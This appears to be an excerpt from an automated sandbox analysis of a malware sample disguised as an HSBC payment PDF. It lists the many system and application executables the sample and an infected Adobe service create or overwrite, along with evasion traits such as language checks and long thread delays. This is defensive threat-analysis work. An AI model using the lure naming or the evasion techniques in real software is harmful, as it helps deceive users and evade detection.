Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Windows\System32\snmptrap.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Windows\System32\Spectrum.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Windows Media Player\wmpnetwk.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | File created: C:\Windows\System32\Locator.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\7-Zip\7z.exe
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | File created: C:\Windows\System32\AppVClient.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | File created: C:\Windows\SysWOW64\perfhost.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\7-Zip\7zG.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | File created: C:\Windows\System32\msiexec.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Windows\System32\TieringEngineService.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | File created: C:\Windows\System32\FXSSVC.exe
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | File created: C:\Windows\System32\SensorDataService.exe
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | File created: C:\Windows\System32\msdtc.exe
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | File created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Windows\System32\wbem\WmiApSrv.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | File created: C:\Windows\System32\alg.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\7-Zip\7zFM.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Windows\System32\VSSVC.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Windows\System32\wbengine.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\AgentService.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Windows\System32\wbem\WmiApSrv.exe
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | File created: C:\Windows\System32\AppVClient.exe
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | File created: C:\Windows\System32\FXSSVC.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Windows\System32\TieringEngineService.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Windows\System32\vds.exe
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | File created: C:\Windows\SysWOW64\perfhost.exe
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | File created: C:\Windows\System32\msiexec.exe
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | File created: C:\Windows\System32\SensorDataService.exe
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | File created: C:\Windows\System32\msdtc.exe

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\System32\TieringEngineService.exe | File created: C:\System Volume Information\Heat\
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Windows\System32\AppVClient.exe | Code function: 7_2_00745346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 7_2_00745346
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Code function: 11_2_00895346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 11_2_00895346
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Code function: 12_2_01A55346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 12_2_01A55346
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Code function: 14_2_00B75346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 14_2_00B75346
                  Source: C:\Windows\System32\Spectrum.exe | Code function: 19_2_007B5346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 19_2_007B5346
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exe | Code function: 21_2_008F5346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 21_2_008F5346
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | API/Special instruction interceptor: Address: CDB4DC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599871
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599765
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599656
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599547
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599437
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599328
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599212
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598894
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598625
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598469
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598344
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598231
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598125
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598015
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597797
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597681
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597563
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597438
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597317
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597188
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597078
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596969
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596859
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596750
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596608
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596485
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596321
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596131
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595943
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595764
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595656
